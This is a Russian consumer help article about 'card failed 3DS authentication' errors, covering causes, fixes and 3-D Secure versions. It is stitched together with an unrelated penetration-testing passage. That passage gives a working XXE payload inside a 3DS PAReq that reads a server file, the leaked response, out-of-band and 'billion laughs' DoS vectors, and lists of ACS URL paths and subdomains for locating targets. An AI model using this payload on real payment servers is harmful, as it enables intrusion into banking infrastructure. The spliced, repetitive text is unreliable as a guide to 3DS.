Карта не прошла 3DS-аутентификацию, либо отклонена платежной системой – что это значит

Основные ошибки✅ при оплате банковской картой?. Подключение 3D Secure и оплата заказа через интернет картой – основные проблемы

3Ds аутентификация – то же самое, что и 3-D Secure

Во-первых, определимся с терминологией. 3Ds аутентификация (она же 3D-secure) это по сути двухфакторная авторизация, двойное действие при подтверждении платежа.

От обычной оплаты в “один клик” 3д-секуре отличает то, что в этапах оплаты появляется еще один шаг – ввод кода на специальной странице вашего банка, который выпустил карту.

3D Secure – это когда при оплате в интернете Вам приходит SMS от Вашего банка, и Вы вводите полученный код в специальном окне.

Код может быть как постоянным, придуманным вами на этапе включения опции 3D-secure в личном кабинете или интернет-банкинге, так и одноразовым, который приходит в СМС или берется из карты кодов банка (всё это зависит от конкретной банковской сети, у разных брендов свои правила на этот счёт).

Данная опция включается при заключении договора обслуживания в банке или самостоятельно клиентом через интернет-банк. Вот как это выглядит в моём кабинете (но у каждого банка структура настроек отличается, и у вас всё может быть по-другому).

Включение 3-D- secure в личном кабинете карты банкаВключение 3-D- secure

Самых частых причин, по которым карта не проходит и появляется статус “карта не прошла 3D-аутентификацию, либо отклонена платежной системой”, всего три:

  1.  Банальная – на карте недостаточно средств
  2. Тоже распространенная – для вашей карты не активирована услуга “3ds-авторизация”
  3. И третья причина – неправильной пароль для этапа 3ds-authentication
    Дело в том, что пароль для расчетов онлайн человек обычно активирует сразу при оформлении карты, но используется редко. А вот другие пароли используются или часто, или даже ежедневно – вход в интернет-банк и т.д.

Поэтому в момент оплаты пользователь видит незнакомое (не часто используемое для 3ds-secure) окно для ввода пароля, но по привычке или не имея под рукой нужного пароля – еще раз вводит пароль для интернет-банка.
Пароль неверный, не для этого этапа, и происходит отказ в обслуживании пластиковой карты.Решения данной проблемы, исходя из вышеизложенных причин, тоже очевидны:

  • зайдите в интернет-банкинг, проверьте наличие средств на карте и заодно убедитесь, что опция 3Д-секьюре включена
  • держите пароль для 3ds-авторизации под рукой перед оплатой, и не путайте его с другими паролями (доступа в личный кабинет банка, и т.д.)

Если же решение не найдено – стоит копнуть глубже: проверить лимиты карты на выполнение суточных операций по сумме, на полный запрет интернет-транзакций или платежей в иностранных магазинах.

Особенности аутентификации

3DS-аутентификация – уникальная система защиты данных банковских карт от совершения финансовых операций без согласия держателя.

Для оплаты покупок в интернет-магазинах нужно указывать следующую информацию:

  • номер и срок действия карты, указанный на лицевой стороне;
  • код с оборотной стороны карты – CVV (CVC).

Если для карты подключена дополнительная защита 3DS-Secure, то пользователю при оплате онлайн следует пройти еще одну процедуру, направленную на противодействие потенциальным мошенникам. Одноразовые пароли поступают в виде смс-сообщения на номер держателя карты. Ввод данных осуществляется на официальной странице одного из банков: ПАО “Сбербанк России”, “ВТБ”, ” Альфа-Банк” и другие.

После прохождения 3DS-аутентификации происходит оплата с учетом последующей переадресации покупателя на сайт продавца. Транзакция не может быть осуществлена без данной операции, ни при каких обстоятельствах.

Версии протокола 3D Secure

v1.0 – 2001 г -…v2.0 – 2014 г – Устарелоv2.1 – 2017 гv2.2 – 2018 г

В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.
Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.

На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.

Image

Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.

На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.

Причины ошибки “Карта не прошла 3DS-аутентификацию”

Существует несколько основных факторов, которые приводят к появлению оповещения о неудачной транзакции:

  • не подключенная функция;
  • неправильный код;
  • истечение срока годности кода (не более 10 минут);
  • неполадки на линии банка, задержки на сервере;
  • неподдерживаемая платежная система или проблемы с настройкой системы в магазине;
  • Встречаются случаи, когда ошибка появлялась при недостаточной сумме на счету.

Карта не прошла 3DS-аутентификацию, либо отклонена платежной системой — что это значит

Подключение занимает не более 1-2 суток. Услуга 3DS аутентификации в большинстве случаев платная, но есть банки, предлагающие бесплатное подключение.

Альфа Банк Ошибка Функциональности 3d Secure Повторите Перевод

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM “file:///proc/sys/kernel/hostname”>]><ThreeDSecure><Message id=“123-123-123-123-123-123″><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message id=” 123-123-123-123-123-123 “><PARes id=” 123-123-123-123-123-123 “><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>ACS server name</merID></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку “billion laughs” (проверялось на тестовом сервере).

Порядок исправления проблемы некорректной аутентификации

Если на экране при оплате появилась надпись “Ваш платеж был отклонен”, то поводов для паники нет. Защитные алгоритмы системы постоянно развиваются и процент несанкционированного доступа злоумышленников к данным предельно низкий.

Оперативное исправление проблемы возможно путем звонка на горячую линию обслуживающего банка.

Представители центра обслуживания проверят настройки карты и дадут первичную консультацию по поводу причин возникшей проблемы. Если это произошло по вине банка или платежной системы, решение займет не более 10 минут.

Возможные ошибки при 3D Secure авторизации

Описание ошибки Возможные причины Как исправить ошибку
Ошибка аутентификации Неверно введены реквизиты Проверьте правильность данных
Не поддерживается валюта платежа Проверьте список доступных валют
Не приходит код К счету привязан другой номер Проверьте привязанный номер в личном кабинете на сайте банка
Ошибка на этапе генерации и отправки Повторите попытку через несколько минут
Память телефона заполнена Удалите старые SMS и повторите попытку
Плохая сотовая связь Найдите место, где телефон стабильно ловит сеть
Введенный код не срабатывает Ошибка при вводе данных Проверьте номер и повторите ввод
Истек срок действия Запросите генерацию нового кода
Не открывается поле для ввода, деньги списывают сразу Интернет-магазин не поддерживает 3DS

Где это можно найти?

В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:

/acs/pareq/___uid___/acspage/cap?RID=14&VAA=B/way4acs/pa?id=____id____/PaReqVISA.jsp/PaReqMC.jsp/mdpayacs/pareq/acs/auth/start.do

И распространенные имена поддоменов:

acs3ds3dssecurecappaymentsecm3dsauthtestacscard

Впрочем, иногда вы можете найти и другие интересные пути.
Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.

Какие у системы преимущества и недостатки?

Любая технология имеет свои преимущества, и не всегда лишена недостатков. В нашем случае явные плюсы и минусы технологии 3D-Secure таковы:

Важно! Для сохранности денег нужно постоянно обновлять антивирусную систему на устройстве, с которого осуществляются платежи и на смартфоне. Это убережет от установки программ «шпионов».

Причины ошибки «Карта не прошла 3DS-аутентификацию»

Обратите внимание, что магазины не получают полные данные о карте, имея доступ лишь к части информации.

Что делать, если с картой все ОК, но оплата не проходит?

Самая типичная проблема, когда оплата не проходит — сбой в банковской системе. В работе банка могут наблюдаться перебои. Это может быть не обязательно ваш банк, а банк который принимает платеж на стороне клиента(которому принадлежит терминал). В этом случае можно дать 2 совета

  1. Подождать и оплатить позднее. Сбои в работе оперативно решаются и уже через час оплата может пройти без проблем. Обычно о сбоях можно узнать по СМС сообщениям или позвонив на горячую линию вашего банка.
  2. Использовать другую карту. Если нельзя оплатить одной — нужно попробывать оплатить другой картой. Если оплата и другой картой не проходит, то это скорее всего сбой на стороне, принимающей платеж. Тут остается только ждать.
Рейтинг
( 1 оценка, среднее 5 из 5 )
Загрузка ...